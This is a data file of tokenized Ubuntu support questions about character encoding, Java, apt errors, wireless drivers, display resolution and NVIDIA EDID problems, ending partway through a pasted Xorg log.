491765	utf-8 issue , do n't know where ?	i am running a node.js server and the following line just is n't working . console.log ( `` ☺☻♥ مرحبا 你好 '' ) ; i opened up the file in nano and cat on my ubuntu server 14.04 ( no gui , no window manager , no kde , no gtk , no nothing , pure ubuntu server 14.04 ) and it looks like this : i have the file in a samba share and when i open it in windows 8 pro it looks as so in notepad++ : this is how the samba config looks like this , the private shares do not have anything fancy or to do with charsets : locale looks as so : /etc/default/locale looks like : and the following command displays a ô in the ubuntu server terminal : perl -co -le ‘print “\x { d4 } ”’ like so : i use the command start_unicode and then hold in alt while typing 1236 and got a diamond ! i ran the following : sudo touch /srv/file.txt sudo bash -c 'echo -e `` \xe2\x82\xac '' ' > /srv/file.txt this resulted in a very nice € symbol in nano however when trying to display the following ☺☻♥ it does not work ( black diamonds ) anyone got any ideas ?
491769	can i format a disk under existing window 8 and install ubuntu ?	my laptop is currently installed with windows 8 , and it has 4 disks , c d e f. now i want to install ubuntu , can i format f disk and install ubuntu with the formatted space ? is so , what are the procedures ? thanks !
491770	ubuntu 14.04 - fake a higher resolution	is there a way to make 1366x768 look more like 1440x810 ? i remember reading about a way to do it on windows , but i do n't know if it can be replicated on ubuntu . edit : this is my xrandr output , screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 16384 x 16384 displayport-0 disconnected ( normal left inverted right x axis y axis ) vga-0 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 410mm x 230mm 1366x768 59.8*+ 1280x1024 60.0 1280x720 60.0 1024x768 60.0 800x600 60.3 640x480 60.0 720x400 70.1 dvi-0 disconnected ( normal left inverted right x axis y axis )
491776	nano via the terminal , how to write special characters ?	as the title says ; nano via the terminal , how to write special characters ? i am having trouble trying to debug a utf8 problem and would like to create a special character in a file via the terminal . anyone know how to make for example alt-code symbols in nano ?
491778	switch to oracle java jdk in 14.04 ?	ubuntu 14.04 comes with openjdk after updating from 13.10 . $ java -version java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) $ what is the safest way to switch to oracle java jdk ? i have some java developments tools ( eclipse , intellij , android studio ) and i would not like to break them after switching to oracle jdk . the reason for this is because these tool are warning me that i should switch to oracle jdk to gain performance and to prevent some issue existing in openjdk .
491779	ubuntu 14.0.4 apt-get update fails for any installs and upgrades in trusty	i have tried various recommendations from the web to no success . the apt-get update gives errors . here are my error messages after sudo apt-get udpate : w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/java/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/java/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i have reviewed and tried the existing stackexchange answers that are not working for me . trying to cleanup the ppa as per advice in sourcse gives me the following errors : for example , the following command to remove the ppa shows other scary messages : winsella @ winsella : ~ $ sudo rm /etc/apt/sources.list.d/ppaname-ppa- $ ( lsb_release -sc ) .list* [ sudo ] password for winsella : no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory failed to open /var/lib/samba/private/secrets.tdb tdbsam_open : failed to open/create tdb passwd [ /var/lib/samba/private/passdb.tdb ] tdbsam_getsampwnam : failed to open /var/lib/samba/private/passdb.tdb ! tdbsam_open : failed to open/create tdb passwd [ /var/lib/samba/private/passdb.tdb ] tdbsam_getsampwnam : failed to open /var/lib/samba/private/passdb.tdb ! tdbsam_open : failed to open/create tdb passwd [ /var/lib/samba/private/passdb.tdb ] tdbsam_new_rid : failed to open /var/lib/samba/private/passdb.tdb ! rm : can not remove â/etc/apt/sources.list.d/ppaname-ppa-trusty.list*â : no such file or directory
491784	remove darkcoin-qt	how do i remove cleanly darkcoin-qt application ( the wallet for darkcoin ) ? i tried `` sudo apt-get remove darkcoin-qt '' but it does not work ( `` unable to locate package ... '' ) .
491789	getting wireless to work correctly on lubuntu : belkin n150 and/or linksys wusb11	first , let me say i 'm a semi-n00b on linux . so bear with me . second , i 've scoured the internet , and there 's a dozen solutions , none of which seem to work exactly right in my situation . please do n't refer me to other pages - i 've probably already read them and have n't been able to get them to work . i 'm running lubuntu 14.04 on a t30 thinkpad with a pentium 4 processor , 1 gb ram , 40gb hard drive , no built-in wireless ( it was removed ) , and two usb-1.0 ports . i have a belkin n-150 wireless usb adapter and a linksys wusb11 wireless usb adapter . the n-150 works sporadically , off of firmware - that is , it connects for a while , but then simply stops responding - it 's not disconnected per se , but it wo n't acknowledge any traffic after a while and has to be manually unplugged and re-plugged . and it does n't do this all the time , either - some nights , it works continuously for hours . during the day , if i get a few hours i 'm very lucky . most of the time it 's 10-20 minutes . edit : forgot to add , when it does this , it starts blinking in a very obvious pattern : up-up , down-down , up-up , down-down ... on the connection properties gui it flashes between idle and sending when it does this , no activity on the back monitor ... worse , when i do finally get it working well - during a bout of it acting up - it 's likely to cause a kernel panic that forces me to restart my computer ( at least , that 's the only time i 've ever seen a kernel panic ) . the linksys wo n't work at all - it shows up in lsusb , but not in ifconfig or iwconfig . with the belkin installed , here 's my lsusb , ifconfig , and iwconfig : lsusb : bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 010 : id 050d:945a belkin components f7d1101 v1 basic wireless adapter [ realtek rtl8188su ] bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub ifconfig : eth0 link encap : ethernet hwaddr 00:0d:60:12 : ec:32 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:264145 errors:0 dropped:0 overruns:0 frame:0 tx packets:264145 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:23276498 ( 23.2 mb ) tx bytes:23276498 ( 23.2 mb ) wlan0 link encap : ethernet hwaddr ec:1a:59:30:22:57 inet addr:192.168.200.154 bcast:192.168.200.255 mask:255.255.255.0 inet6 addr : fe80 : :ee1a:59ff : fe30:2257/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2539 errors:0 dropped:14 overruns:0 frame:0 tx packets:1425 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:981712 ( 981.7 kb ) tx bytes:210156 ( 210.1 kb ) iwconfig : wlan0 ieee 802.11bg essid : '' 11fx05106237 '' nickname : '' rtl_wifi '' mode : managed frequency:2.462 ghz access point : 0c : d5:02 : ab:0c : fe bit rate:54 mb/s sensitivity:0/0 retry : off rts thr : off fragment thr : off power management : off link quality=100/100 signal level=100/100 noise level=0/100 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 irda0 no wireless extensions . lo no wireless extensions . eth0 no wireless extensions . i tried installing the drivers - 8712 , 8192 , 81811 - but at the make step , keep getting error 1 and error 2 . ( have n't even figured out drivers for the linksys yet ) the belkin is listed on the sticker as f9l1001v1 . any other output you want , let me know . oh , and ndiswrapper - and wine , for that matter - do n't seem to work at all either , though i can try again . ( i only mention wine because i suspect for some reason windows-based stuff just does n't want to work at all . ) i 've been going at this for weeks with no luck . i basically have to keep the adapter close to hand , so i can unplug it constantly . and i ca n't access our wireless router - it 's in the building manager 's office ( but it 's open wifi , ours to use ) . so someone , please , talk me through this . thanks !
491792	what could cause display not as sharp under ubuntu as under winxp ?	i dual boot ( 14.04 & win xp ) . both are using nvidia geforce 8400 card and latest nvidia drivers . both work fine ... except , when i play .avi or any other video formats , the picture does n't seem as sharp/crisp when running under ubuntu as when i run the same file under winxp . monitor is an hp w2207h at 1680 x 1050 with the monitor controls at the same settings . my imagination ? or are there settings i can play with in ubuntu to sharpen the image ? ( note that the sharpness under ubuntu is very watchable ... just not quite as sharp as under winxp . any ideas ? thanks .
491793	laptop overheats running ubuntu 14.04	i recently installed 14.04 on my toshiba satellite 305d . it has an amd athlon x2 duel-core and 2gb of ram with radeon 3100 . i know she 's not much , but i 'm a peace corps volunteer living in west africa and she 's all i got . it 's been overheating super quickly and shutting itself down . i 've had this trouble with ubuntu before but it 's a bit worse this time round . i duel-boot windows 7 and never have this trouble with it . i imagine it may be something wrong with recognizing my graphics , but i ca n't find any good advice about what exactly to do about that . admittedly , i 'm an ubuntu noob . any help would be greatly appreciated .
491794	problem installing windows after ubuntu	i want to instal both windows and ubuntu and i have a bit of a situation . i had ubuntu on my laptop and i understand that it is better to install windows first . whenever i try to install windows i get an error saying `` a required cd/dvd device driver is missing '' or something like that . i am trying to install it from a cd that i have used a year ago on the same laptop . i tried other windows cd as well , same result . i have already spent a day trying to fix this and if you could help me , that would be so great . ( sorry for any mistakes , english is not my first language )
491795	display seems to crash after login	when i log in as main user , the display seems to crash . it only shows artifacts and the unity bar at the top . when i log out and back in as a guest everything is fine . so there must be a config in users directory which is loaded at login and has wrong settings so the display fails . i tried recovery mode and deleted /etc/x11/xorg.conf but that does not help . ifound some files in user folder but i do n't know which one to edit or remove . i use ubuntu 14.04 with 3.15 kernel which was working fine so far . the problem started , when one of the monitors got disconnected from graphicscard and the system tried to jump into single monitor mode . since then i ca n't use the system with main user . only guest works . maybe someone can help thank you so far ! edit : in safe mode it also works very well .
491796	ubuntu skype remove previows id	i am very new in ubuntu . when i installed skype i used an old id but i have a newer one that is exactly the same as my hotmail email . every time i open the skype it is opened with older id but i would like to change this and i did n't find how . i found how open other instance by using skype -- secondary but i would like to remove the first one because i want to lock to launcher with the newer . i read some forums telling about delete ./skype folder but i do n't know which folder is this one .
491805	nvidia driver problems with edid	i have edid problems with proprietary nvidia drivers in ubuntu 14.04 . i have a lenovo y470 with dual nvidia/intel graphics card . the resolution of the screen is 1366x768 . i have tried drivers the official ubuntu repositories , the nvidia website and xorg_edgers ppa . right now i am using nvidia-331 from xorg_edgers . in the xorg.0.log file , i get the following warnings ( ww ) nvidia ( gpu-0 ) unablet to read edid for display device crt-0 ( ** ) using horizsync/vertrefersh ranges from the edid for display device ( crt-0 ) several times and then ( ii ) modesetting ( g0 ) : edid vendor `` sec '' , prod id 16716 ( ii ) modesetting ( g0 ) : modeline 1366x768x0.0 72.33 1366 ... . reporting 4 5 34 247 have a mater to look out for adjust shatters 0 1366 need to create shared pixmap i will post the full xorg.0.log soon . i can only log in using recovery mode . [ 49.098 ] x.org x server 1.15.1 release date : 2014-04-13 [ 49.098 ] x protocol version 11 , revision 0 [ 49.098 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 49.098 ] current operating system : linux sancar-lenovo-ideapad-y470 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 [ 49.098 ] kernel command line : boot_image=/boot/vmlinuz-3.13.0-29-generic root=uuid=c9c05892-a3b6-43fc-b092-285426505e74 ro quiet splash vt.handoff=7 [ 49.098 ] build date : 16 april 2014 01:36:29pm [ 49.098 ] xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 49.098 ] current version of pixman : 0.30.2 [ 49.098 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 49.098 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 49.098 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : fri jul 4 15:31:10 2014 [ 49.136 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 49.136 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 49.697 ] ( == ) serverlayout `` layout '' [ 49.697 ] ( ** ) | -- > screen `` nvidia '' ( 0 ) [ 49.697 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 49.697 ] ( ** ) | | -- > device `` nvidia '' [ 49.697 ] ( == ) no monitor specified for screen `` nvidia '' . using a default monitor configuration . [ 49.697 ] ( ** ) | -- > inactive device `` intel '' [ 49.697 ] ( == ) automatically adding devices [ 49.697 ] ( == ) automatically enabling devices [ 49.697 ] ( == ) automatically adding gpu devices [ 49.904 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 49.904 ] entry deleted from font path . [ 49.904 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 49.904 ] entry deleted from font path . [ 49.904 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 49.904 ] entry deleted from font path . [ 49.948 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 49.948 ] entry deleted from font path . [ 49.948 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 49.948 ] entry deleted from font path . [ 49.948 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 49.948 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 49.948 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 49.948 ] ( ii ) loader magic : 0x7faa21a16d60 [ 49.948 ] ( ii ) module abi versions : [ 49.948 ] x.org ansi c emulation : 0.4 [ 49.948 ] x.org video driver : 15.0 [ 49.948 ] x.org xinput driver : 20.0 [ 49.948 ] x.org server extension : 8.0 [ 49.948 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card1 ) [ 49.948 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 49.951 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0116:17aa:3981 rev 9 , mem @ 0xf1400000/4194304 , 0xe0000000/268435456 , i/o @ 0x00003000/64 [ 49.951 ] ( -- ) pci : ( 0:1:0:0 ) 10de:0df6:17aa:3981 rev 161 , mem @ 0xf0000000/16777216 , 0xc0000000/268435456 , 0xd0000000/33554432 , i/o @ 0x00002000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 49.984 ] initializing built-in extension generic event extension [ 49.984 ] initializing built-in extension shape [ 49.984 ] initializing built-in extension mit-shm [ 49.984 ] initializing built-in extension xinputextension [ 49.984 ] initializing built-in extension xtest [ 49.984 ] initializing built-in extension big-requests [ 49.984 ] initializing built-in extension sync [ 49.984 ] initializing built-in extension xkeyboard [ 49.984 ] initializing built-in extension xc-misc [ 49.984 ] initializing built-in extension security [ 49.984 ] initializing built-in extension xinerama [ 49.984 ] initializing built-in extension xfixes [ 49.984 ] initializing built-in extension render [ 49.984 ] initializing built-in extension randr [ 49.984 ] initializing built-in extension composite [ 49.984 ] initializing built-in extension damage [ 49.984 ] initializing built-in extension mit-screen-saver [ 49.984 ] initializing built-in extension double-buffer [ 49.984 ] initializing built-in extension record [ 49.984 ] initializing built-in extension dpms [ 49.984 ] initializing built-in extension present [ 49.984 ] initializing built-in extension dri3 [ 49.984 ] initializing built-in extension x-resource [ 49.984 ] initializing built-in extension xvideo [ 49.984 ] initializing built-in extension xvideo-motioncompensation [ 49.984 ] initializing built-in extension selinux [ 49.984 ] initializing built-in extension xfree86-vidmodeextension [ 49.984 ] initializing built-in extension xfree86-dga [ 49.984 ] initializing built-in extension xfree86-dri [ 49.984 ] initializing built-in extension dri2 [ 49.984 ] ( ww ) `` glamoregl '' will not be loaded unless you 've specified it to be loaded elsewhere . [ 49.984 ] ( ii ) `` glx '' will be loaded by default . [ 49.984 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 49.984 ] ( ii ) loadmodule : `` glx '' [ 49.984 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 53.393 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 53.393 ] compiled for 4.0.2 , module version = 1.0.0 [ 53.393 ] module class : x.org server extension [ 53.393 ] ( ii ) nvidia glx module 331.79 sat may 17 23:58:32 pdt 2014 [ 53.443 ] loading extension glx [ 53.443 ] ( ii ) loadmodule : `` nvidia '' [ 53.443 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 53.758 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 53.758 ] compiled for 4.0.2 , module version = 1.0.0 [ 53.758 ] module class : x.org video driver [ 53.794 ] ( ii ) loadmodule : `` modesetting '' [ 53.844 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 53.916 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 53.916 ] compiled for 1.15.0 , module version = 0.8.1 [ 53.916 ] module class : x.org video driver [ 53.916 ] abi class : x.org video driver , version 15.0 [ 53.916 ] ( ii ) nvidia dlloader x driver 331.79 sat may 17 23:37:42 pdt 2014 [ 53.916 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 53.940 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 53.940 ] ( ++ ) using vt number 7 [ 53.956 ] ( ii ) loading sub module `` fb '' [ 53.956 ] ( ii ) loadmodule : `` fb '' [ 53.956 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 54.021 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 54.021 ] compiled for 1.15.1 , module version = 1.0.0 [ 54.021 ] abi class : x.org ansi c emulation , version 0.4 [ 54.021 ] ( ww ) unresolved symbol : fbgetgcprivatekey [ 54.021 ] ( ii ) loading sub module `` wfb '' [ 54.021 ] ( ii ) loadmodule : `` wfb '' [ 54.021 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 54.107 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 54.107 ] compiled for 1.15.1 , module version = 1.0.0 [ 54.107 ] abi class : x.org ansi c emulation , version 0.4 [ 54.107 ] ( ii ) loading sub module `` ramdac '' [ 54.107 ] ( ii ) loadmodule : `` ramdac '' [ 54.107 ] ( ii ) module `` ramdac '' already built-in [ 54.187 ] ( ii ) modesetting ( g0 ) : using drv /dev/dri/card0 [ 54.187 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` nvidia '' for depth/fbbpp 24/32 [ 54.187 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 54.187 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 54.187 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 54.187 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 54.187 ] ( ** ) nvidia ( 0 ) : option `` constraincursor '' `` off '' [ 54.187 ] ( ** ) nvidia ( 0 ) : option `` allowemptyinitialconfiguration '' `` on '' [ 54.188 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 55.621 ] ( ww ) nvidia ( 0 ) : unable to read edid for display device crt-0 [ 55.621 ] ( ii ) nvidia ( gpu-0 ) : found drm driver nvidia-drm ( 20130102 ) [ 55.622 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gt 550m ( gf108 ) at pci:1:0:0 ( gpu-0 ) [ 55.622 ] ( -- ) nvidia ( 0 ) : memory : 1048576 kbytes [ 55.622 ] ( -- ) nvidia ( 0 ) : videobios : 70.08.4b.00.02 [ 55.623 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 55.625 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gt 550m at pci:1:0:0 [ 55.625 ] ( -- ) nvidia ( 0 ) : crt-0 ( boot , connected ) [ 55.625 ] ( -- ) nvidia ( 0 ) : crt-0 : 400.0 mhz maximum pixel clock [ 55.625 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 55.625 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 55.625 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 55.628 ] ( == ) nvidia ( 0 ) : [ 55.628 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 55.628 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 55.628 ] ( == ) nvidia ( 0 ) : [ 55.628 ] ( ii ) nvidia ( 0 ) : validated metamodes : [ 55.628 ] ( ii ) nvidia ( 0 ) : `` crt-0 : nvidia-auto-select '' [ 55.628 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1024 x 768 [ 55.631 ] ( ww ) nvidia ( 0 ) : unable to get display device crt-0 's edid ; can not compute dpi [ 55.631 ] ( ww ) nvidia ( 0 ) : from crt-0 's edid . [ 55.631 ] ( == ) nvidia ( 0 ) : dpi set to ( 75 , 75 ) ; computed from built-in default [ 55.631 ] ( == ) modesetting ( g0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 55.631 ] ( == ) modesetting ( g0 ) : rgb weight 888 [ 55.631 ] ( == ) modesetting ( g0 ) : default visual is truecolor [ 55.631 ] ( ii ) modesetting ( g0 ) : shadowfb : preferred yes , enabled yes [ 55.631 ] ( ii ) modesetting ( g0 ) : output lvds-1-0 has no monitor section [ 55.633 ] ( ii ) modesetting ( g0 ) : output vga-1-0 has no monitor section [ 55.633 ] ( ii ) modesetting ( g0 ) : output hdmi-1-0 has no monitor section [ 55.633 ] ( ii ) modesetting ( g0 ) : output displayport-1-0 has no monitor section [ 55.633 ] ( ii ) modesetting ( g0 ) : edid for output lvds-1-0 [ 55.633 ] ( ii ) modesetting ( g0 ) : manufacturer : sec model : 414c serial # : 0 [ 55.633 ] ( ii ) modesetting ( g0 ) : year : 2010 week : 0 [ 55.633 ] ( ii ) modesetting ( g0 ) : edid version : 1.3 [ 55.633 ] ( ii ) modesetting ( g0 ) : digital display input [ 55.633 ] ( ii ) modesetting ( g0 ) : max image size [ cm ] : horiz . : 31 vert . : 17 [ 55.633 ] ( ii ) modesetting ( g0 ) : gamma : 2.20 [ 55.633 ] ( ii ) modesetting ( g0 ) : dpms capabilities : standby suspend off [ 55.633 ] ( ii ) modesetting ( g0 ) : supported color encodings : rgb 4:4:4 ycrcb 4:4:4 [ 55.633 ] ( ii ) modesetting ( g0 ) : first detailed timing is preferred mode [ 55.633 ] ( ii ) modesetting ( g0 ) : redx : 0.580 redy : 0.340 greenx : 0.310 greeny : 0.550 [ 55.633 ] ( ii ) modesetting ( g0 ) : bluex : 0.155 bluey : 0.155 whitex : 0.313 whitey : 0.329 [ 55.633 ] ( ii ) modesetting ( g0 ) : manufacturer 's mask : 0 [ 55.633 ] ( ii ) modesetting ( g0 ) : supported detailed timing : [ 55.633 ] ( ii ) modesetting ( g0 ) : clock : 72.3 mhz image size : 309 x 174 mm [ 55.633 ] ( ii ) modesetting ( g0 ) : h_active : 1366 h_sync : 1414 h_sync_end 1446 h_blank_end 1526 h_border : 0 [ 55.633 ] ( ii ) modesetting ( g0 ) : v_active : 768 v_sync : 770 v_sync_end 775 v_blanking : 790 v_border : 0 [ 55.633 ] ( ii ) modesetting ( g0 ) : unknown vendor-specific block f [ 55.633 ] ( ii ) modesetting ( g0 ) : samsung [ 55.633 ] ( ii ) modesetting ( g0 ) : 140at20-l01 [ 55.633 ] ( ii ) modesetting ( g0 ) : edid ( in hex ) : [ 55.633 ] ( ii ) modesetting ( g0 ) : 00ffffffffffff004ca34c4100000000 [ 55.633 ] ( ii ) modesetting ( g0 ) : 00140103801f1178ea87f594574f8c27 [ 55.633 ] ( ii ) modesetting ( g0 ) : 27505400000001010101010101010101 [ 55.634 ] ( ii ) modesetting ( g0 ) : 010101010101411c56a0500016303020 [ 55.634 ] ( ii ) modesetting ( g0 ) : 250035ae100000190000000f00000000 [ 55.634 ] ( ii ) modesetting ( g0 ) : 000000000025d9066a00000000fe0053 [ 55.634 ] ( ii ) modesetting ( g0 ) : 414d53554e470a2020202020000000fe [ 55.634 ] ( ii ) modesetting ( g0 ) : 00313430415432302d4c30310a2000e1 [ 55.634 ] ( ii ) modesetting ( g0 ) : printing probed modes for output lvds-1-0 [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 1366x768 '' x60.0 72.33 1366 1414 1446 1526 768 770 775 790 -hsync -vsync ( 47.4 khz ep ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 1360x768 '' x59.8 84.75 1360 1432 1568 1776 768 771 781 798 -hsync +vsync ( 47.7 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 1360x768 '' x60.0 72.00 1360 1408 1440 1520 768 771 781 790 +hsync -vsync ( 47.4 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 1024x768 '' x120.1 133.47 1024 1100 1212 1400 768 768 770 794 doublescan -hsync +vsync ( 95.3 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 960x720 '' x120.0 117.00 960 1024 1128 1300 720 720 722 750 doublescan -hsync +vsync ( 90.0 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 928x696 '' x120.1 109.15 928 976 1088 1264 696 696 698 719 doublescan -hsync +vsync ( 86.4 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 896x672 '' x120.0 102.40 896 960 1060 1224 672 672 674 697 doublescan -hsync +vsync ( 83.7 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 960x600 '' x120.0 77.00 960 984 1000 1040 600 601 604 617 doublescan +hsync -vsync ( 74.0 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 960x540 '' x120.0 69.25 960 984 1000 1040 540 541 544 555 doublescan +hsync -vsync ( 66.6 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x120.0 81.00 800 832 928 1080 600 600 602 625 doublescan +hsync +vsync ( 75.0 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 840x525 '' x120.0 73.12 840 892 980 1120 525 526 529 544 doublescan -hsync +vsync ( 65.3 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 840x525 '' x119.8 59.50 840 864 880 920 525 526 529 540 doublescan +hsync -vsync ( 64.7 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 800x512 '' x120.3 51.56 800 800 828 832 512 512 514 515 doublescan +hsync +vsync ( 62.0 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 700x525 '' x120.0 61.00 700 744 820 940 525 526 532 541 doublescan +hsync +vsync ( 64.9 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 640x512 '' x120.0 54.00 640 664 720 844 512 512 514 533 doublescan +hsync +vsync ( 64.0 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 720x450 '' x119.8 53.25 720 760 836 952 450 451 454 467 doublescan -hsync +vsync ( 55.9 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x120.0 54.00 640 688 744 900 480 480 482 500 doublescan +hsync +vsync ( 60.0 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 680x384 '' x119.6 42.38 680 716 784 888 384 385 390 399 doublescan -hsync +vsync ( 47.7 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 680x384 '' x119.9 36.00 680 704 720 760 384 385 390 395 doublescan +hsync -vsync ( 47.4 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 576x432 '' x120.1 40.81 576 608 668 760 432 432 434 447 doublescan -hsync +vsync ( 53.7 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 512x384 '' x120.0 32.50 512 524 592 672 384 385 388 403 doublescan -hsync -vsync ( 48.4 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 400x300 '' x120.6 20.00 400 420 484 528 300 300 302 314 doublescan +hsync +vsync ( 37.9 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 400x300 '' x112.7 18.00 400 412 448 512 300 300 301 312 doublescan +hsync +vsync ( 35.2 khz d ) [ 55.634 ] ( ii ) modesetting ( g0 ) : modeline `` 320x240 '' x120.1 12.59 320 328 376 400 240 245 246 262 doublescan -hsync -vsync ( 31.5 khz d ) [ 55.635 ] ( ii ) modesetting ( g0 ) : edid for output vga-1-0 [ 55.635 ] ( ii ) modesetting ( g0 ) : edid for output hdmi-1-0 [ 55.636 ] ( ii ) modesetting ( g0 ) : edid for output displayport-1-0 [ 55.636 ] ( ii ) modesetting ( g0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 55.636 ] ( == ) modesetting ( g0 ) : dpi set to ( 96 , 96 ) [ 55.636 ] ( ii ) loading sub module `` fb '' [ 55.636 ] ( ii ) loadmodule : `` fb '' [ 55.636 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 55.636 ] ( ii 